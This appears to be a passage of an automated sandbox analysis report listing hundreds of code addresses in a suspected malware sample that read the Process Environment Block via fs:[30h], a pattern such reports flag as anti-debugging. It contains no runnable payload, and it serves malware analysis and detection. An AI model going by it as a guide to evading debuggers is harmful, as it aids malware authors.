    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E0F525 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E1B52F mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36E35537 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D97505 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D97505 mov ecx, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D6D534 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 4_2_36D9D530 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D530 mov eax, dword ptr fs:[00000030h]4_2_36D9D530
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E352E2 mov eax, dword ptr fs:[00000030h]4_2_36E352E2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5B2D3 mov eax, dword ptr fs:[00000030h]4_2_36D5B2D3
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F2D0 mov eax, dword ptr fs:[00000030h]4_2_36D8F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F2D0 mov eax, dword ptr fs:[00000030h]4_2_36D8F2D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E112ED mov eax, dword ptr fs:[00000030h]4_2_36E112ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B2F0 mov eax, dword ptr fs:[00000030h]4_2_36E0B2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0B2F0 mov eax, dword ptr fs:[00000030h]4_2_36E0B2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D692C5 mov eax, dword ptr fs:[00000030h]4_2_36D692C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D692C5 mov eax, dword ptr fs:[00000030h]4_2_36D692C5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B2C0 mov eax, dword ptr fs:[00000030h]4_2_36D8B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F2F8 mov eax, dword ptr fs:[00000030h]4_2_36E1F2F8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D592FF mov eax, dword ptr fs:[00000030h]4_2_36D592FF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E292A6 mov eax, dword ptr fs:[00000030h]4_2_36E292A6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9329E mov eax, dword ptr fs:[00000030h]4_2_36D9329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9329E mov eax, dword ptr fs:[00000030h]4_2_36D9329E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35283 mov eax, dword ptr fs:[00000030h]4_2_36E35283
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov eax, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov eax, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov ecx, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE92BC mov ecx, dword ptr fs:[00000030h]4_2_36DE92BC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D752A0 mov eax, dword ptr fs:[00000030h]4_2_36D752A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF72A0 mov eax, dword ptr fs:[00000030h]4_2_36DF72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF72A0 mov eax, dword ptr fs:[00000030h]4_2_36DF72A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2D26B mov eax, dword ptr fs:[00000030h]4_2_36E2D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2D26B mov eax, dword ptr fs:[00000030h]4_2_36E2D26B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9724D mov eax, dword ptr fs:[00000030h]4_2_36D9724D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59240 mov eax, dword ptr fs:[00000030h]4_2_36D59240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59240 mov eax, dword ptr fs:[00000030h]4_2_36D59240
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA1270 mov eax, dword ptr fs:[00000030h]4_2_36DA1270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DA1270 mov eax, dword ptr fs:[00000030h]4_2_36DA1270
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D89274 mov eax, dword ptr fs:[00000030h]4_2_36D89274
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B256 mov eax, dword ptr fs:[00000030h]4_2_36E1B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B256 mov eax, dword ptr fs:[00000030h]4_2_36E1B256
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35227 mov eax, dword ptr fs:[00000030h]4_2_36E35227
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97208 mov eax, dword ptr fs:[00000030h]4_2_36D97208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D97208 mov eax, dword ptr fs:[00000030h]4_2_36D97208
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F3E6 mov eax, dword ptr fs:[00000030h]4_2_36E1F3E6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E353FC mov eax, dword ptr fs:[00000030h]4_2_36E353FC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1B3D0 mov ecx, dword ptr fs:[00000030h]4_2_36E1B3D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB739A mov eax, dword ptr fs:[00000030h]4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB739A mov eax, dword ptr fs:[00000030h]4_2_36DB739A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E013B9 mov eax, dword ptr fs:[00000030h]4_2_36E013B9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D933A0 mov eax, dword ptr fs:[00000030h]4_2_36D933A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D933A0 mov eax, dword ptr fs:[00000030h]4_2_36D933A0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D833A5 mov eax, dword ptr fs:[00000030h]4_2_36D833A5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E3539D mov eax, dword ptr fs:[00000030h]4_2_36E3539D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59353 mov eax, dword ptr fs:[00000030h]4_2_36D59353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59353 mov eax, dword ptr fs:[00000030h]4_2_36D59353
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E1F367 mov eax, dword ptr fs:[00000030h]4_2_36E1F367
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E03370 mov eax, dword ptr fs:[00000030h]4_2_36E03370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D34C mov eax, dword ptr fs:[00000030h]4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D34C mov eax, dword ptr fs:[00000030h]4_2_36D5D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35341 mov eax, dword ptr fs:[00000030h]4_2_36E35341
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67370 mov eax, dword ptr fs:[00000030h]4_2_36D67370
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2132D mov eax, dword ptr fs:[00000030h]4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2132D mov eax, dword ptr fs:[00000030h]4_2_36E2132D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE930B mov eax, dword ptr fs:[00000030h]4_2_36DE930B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D57330 mov eax, dword ptr fs:[00000030h]4_2_36D57330
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8F32A mov eax, dword ptr fs:[00000030h]4_2_36D8F32A
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D890DB mov eax, dword ptr fs:[00000030h]4_2_36D890DB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov ecx, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D770C0 mov eax, dword ptr fs:[00000030h]4_2_36D770C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD0C0 mov eax, dword ptr fs:[00000030h]4_2_36DDD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD0C0 mov eax, dword ptr fs:[00000030h]4_2_36DDD0C0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E350D9 mov eax, dword ptr fs:[00000030h]4_2_36E350D9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D850E4 mov eax, dword ptr fs:[00000030h]4_2_36D850E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D850E4 mov ecx, dword ptr fs:[00000030h]4_2_36D850E4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D65096 mov eax, dword ptr fs:[00000030h]4_2_36D65096
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9909C mov eax, dword ptr fs:[00000030h]4_2_36D9909C
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D090 mov eax, dword ptr fs:[00000030h]4_2_36D8D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8D090 mov eax, dword ptr fs:[00000030h]4_2_36D8D090
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5D08D mov eax, dword ptr fs:[00000030h]4_2_36D5D08D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DED080 mov eax, dword ptr fs:[00000030h]4_2_36DED080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DED080 mov eax, dword ptr fs:[00000030h]4_2_36DED080
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E35060 mov eax, dword ptr fs:[00000030h]4_2_36E35060
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D8B052 mov eax, dword ptr fs:[00000030h]4_2_36D8B052
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov ecx, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D71070 mov eax, dword ptr fs:[00000030h]4_2_36D71070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DDD070 mov ecx, dword ptr fs:[00000030h]4_2_36DDD070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DE106E mov eax, dword ptr fs:[00000030h]4_2_36DE106E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0705E mov ebx, dword ptr fs:[00000030h]4_2_36E0705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E0705E mov eax, dword ptr fs:[00000030h]4_2_36E0705E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E2903E mov eax, dword ptr fs:[00000030h]4_2_36E2903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E331E1 mov eax, dword ptr fs:[00000030h]4_2_36E331E1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D1D0 mov eax, dword ptr fs:[00000030h]4_2_36D9D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D9D1D0 mov ecx, dword ptr fs:[00000030h]4_2_36D9D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E071F9 mov esi, dword ptr fs:[00000030h]4_2_36E071F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E351CB mov eax, dword ptr fs:[00000030h]4_2_36E351CB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D851EF mov eax, dword ptr fs:[00000030h]4_2_36D851EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D651ED mov eax, dword ptr fs:[00000030h]4_2_36D651ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E111A4 mov eax, dword ptr fs:[00000030h]4_2_36E111A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DB7190 mov eax, dword ptr fs:[00000030h]4_2_36DB7190
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E15180 mov eax, dword ptr fs:[00000030h]4_2_36E15180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36E15180 mov eax, dword ptr fs:[00000030h]4_2_36E15180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D7B1B0 mov eax, dword ptr fs:[00000030h]4_2_36D7B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D67152 mov eax, dword ptr fs:[00000030h]4_2_36D67152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D59148 mov eax, dword ptr fs:[00000030h]4_2_36D59148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF3140 mov eax, dword ptr fs:[00000030h]4_2_36DF3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36DF9179 mov eax, dword ptr fs:[00000030h]4_2_36DF9179
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 4_2_36D5F172 mov eax, dword ptr fs:[00000030h]4_2_36D5F172
